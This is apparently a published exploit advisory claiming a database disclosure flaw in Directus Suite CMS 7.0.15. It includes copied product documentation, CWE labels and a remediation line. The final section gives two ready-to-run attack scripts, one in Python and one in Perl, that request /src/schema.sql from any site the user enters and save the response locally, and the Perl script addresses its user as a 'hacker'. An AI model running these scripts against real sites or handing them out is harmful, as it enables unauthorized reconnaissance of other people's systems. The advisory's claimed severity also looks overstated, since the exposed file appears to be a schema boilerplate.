Directus Suite CMS version 7.0.15 suffers from a database disclosure vulnerability.
74e365d54904b61c4e9289a057f5d0a9
###########################################################################
# Exploit Title : Directus Suite CMS 7.0.15 Database Disclosure Exploit
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 02/04/2019
# Vendor Homepage : directus.io
# Software Download Link : github.com/directus/directus/archive/master.zip
# Software Information Link : docs.directus.io/guides/database.html#directus-schema
github.com/directus/directus
# Software Version : 7 - 7.0.9 - 7.0.15
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Information Link about => MySQL database dump
acunetix.com/vulnerabilities/web/mysql-database-dump/
###########################################################################
# Description about Software :
***************************
Directus 7 Suite Future-Proof Headless CMS & API for Custom Databases.
Directus is an open-source suite of software that provides an instant API wrapper for SQL databases
and an intuitive Admin App for non-technical users to manage that content. It's like a safe, friendly, and
super-powered "database client" (eg: PHP-my-Admin or Sequel Pro).
###########################################################################
# Impact :
***********
* The product stores sensitive information in files or directories that are accessible
to actors outside of the intended control sphere.
* An information exposure is the intentional or unintentional disclosure of information
to an actor that is not explicitly authorized to have access to that information.
* A database dump contains a record of the table structure and/or the data from a database
and is usually in the form of a list of SQL statements. A database dump is most often used for
backing up a database so that its contents can be restored in the event of data loss.
This file contains a MySQL database dump. This information is highly sensitive
and should not be found on a production system.
* Remediation - Restrict access to this file or remove it from the system.
Information :
************
Database-First =>
Directus follows a database-first approach, storing all of your data unaltered
in pure SQL databases with that can be completely customized.
Access and Optimization =>
Directus mirrors your actual database so it will automatically stay in sync with
any changes made directly to the database! With the full power of SQL unlocked, you can:
Architect your actual database with meaningful table and column names
Infinitely optimize with indexing, datatypes, lengths, defaults, keys, encoding, etc
Update your database schema at any point and Directus will instantly reflect changes
Create, update, and delete content directly from the database
Direct Access =>
This database-first approach means that you have the option to completely bypass
Directus if needed. Connecting your application directly to the database means Directus is completed.
Creating a Database
# MySQL
Connect to MySQL:
$ mysql -h <host> -u <user> -p
The command above will ask you for the user password:
$ mysql -h localhost -u root -p
Enter password: ****
After you successfully log into MySQL, run the CREATE DATABASE command:
mysql> CREATE DATABASE directus;
Query OK, 1 row affected (0.00 sec)
# Directus Schema
This document provides an explanation of all tables and fields within the Directus schema boilerplate.
Name Description
directus_activity Log of all actions (eg: item updates) performed through the API (or App)
directus_activity_read Tracks if a user has seen an Activity/Message item
directus_collection_presets User's collection preferences and bookmarks for Item Listing page
directus_collections Information for database tables (collections) managed by Directus
directus_fields Information for database columns (fields) and their interfaces
directus_files Metadata for all files and embeds added to Directus
directus_folders Nestable virtual directories used to organize Directus files
directus_migrations Database schema changes for upgrades/downgrades created by Phinx
directus_permissions Defines specific API access rules for a specific Role
directus_relations Keys and junctions for field-level relationships between collections
directus_revisions The delta and full data snapshot for all item Activity (eg: updates)
directus_roles Listing of user roles that group together sets of permissions
directus_settings Ad-hoc key-value-pairs for storing Global and Extension settings
directus_user_roles Junction table allowing users to possess multiple roles
directus_users Directory of all App and API Users
###########################################################################
File :
*****
/directus/src/schema.sql
/src/schema.sql
/schema.sql
Information :
************
# Sequel Pro SQL dump
# Version 4541
# Host: localhost (MySQL 5.6.38)
# Database: directus
# Dump of table directus_activity
# Dump of table directus_activity_seen
# Dump of table directus_collection_presets
# Dump of table directus_collections
# Dump of table directus_fields
# Dump of table directus_files
# Dump of table directus_folders
# Dump of table directus_migrations
# Dump of table directus_permissions
# Dump of table directus_relations
# Dump of table directus_revisions
# Dump of table directus_roles
# Dump of table directus_settings
# Dump of table directus_user_roles
# Dump of table directus_users
###########################################################################
# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/src/schema.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit
###########################################################################
# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('Directus Suite CMS 7.0.15 Database Disclosure Exploit');
system('color a');
if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;
$File="src/schema.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/src/schema.sql");
if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/src/schema.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}
###########################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###########################################################################